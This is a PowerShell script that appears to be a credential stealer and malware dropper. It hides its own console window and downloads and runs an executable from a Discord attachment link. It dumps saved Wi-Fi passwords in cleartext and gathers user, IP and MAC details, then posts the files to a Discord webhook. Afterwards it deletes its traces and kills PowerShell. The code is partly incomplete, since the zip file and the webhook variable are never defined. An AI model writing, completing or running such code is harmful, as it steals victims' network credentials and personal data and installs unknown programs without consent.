Add-Type -Name Window -Namespace Console -MemberDefinition '
[DllImport("Kernel32.dll")]
public static extern IntPtr GetConsoleWindow();
[DllImport("user32.dll")]
public static extern bool MoveWindow(IntPtr hWnd, int X, int Y, int W, int H);
'
$hwnd = [Console.Window]::GetConsoleWindow()
[Console.Window]::MoveWindow($hwnd, -2000, -2000, 800, 600, $true)   
Invoke-WebRequest 'https://cdn.discordapp.com/attachments/975173196103966800/1435755657705029790/fun.exe?ex=690d1f27&is=690bcda7&hm=b2aad148ae82f9f7533f919ccdbe006c76d041af5dab43587d910bf9de9d3466&'  -OutFile 'program.exe'; Start-Process -FilePath ".\program.exe" -Wait
$e="$env:LOCALAPPDATA\Temp"; netsh wlan export profile key=clear folder=$e | Out-Null; Get-ChildItem "$e\Wi-Fi*.xml" | %{$x=[xml](gc $_); "SSID:$($x.WLANProfile.SSIDConfig.SSID.name) | Password:$($x.WLANProfile.MSM.security.sharedKey.keyMaterial)"} > "$e\wifi.txt"

#scrape the localappdata for password files
$zip="$env:TEMP\funny_stuff_folder.zip"
$whoami_content = whoami

ipconfig /all | Out-File -FilePath "$e\ipcfg.txt" # save ipconfig as a file

$mac  = (Get-NetAdapter).MacAddress
$ipv4 = (Get-NetIPAddress -AddressFamily IPv4).IPAddress
$ipv6 = (Get-NetIPAddress -AddressFamily IPv6).IPAddress

#send to discord

#send http
& curl.exe -X POST `
  -F "content=$($whoami_content) |IPS: $IPv4 | MACS: $mac | IPv6: $ipv6 | @everyone" `
  -F "file1=@$zip" `
  -F "file2=@$e\wifi.txt" `
  -F "file3=@$e\ipcfg.txt" `
  $wh *> $null   

# cleanup
cls
Remove-Item -Path "$e\wifi.txt"
Remove-Item -Path "$e\ipcfg.txt"
Remove-Item -Path "$zip"
#exit quickly
taskkill /F /IM pwsh.exe /IM powershell.exe 2>$null 
echo sent!
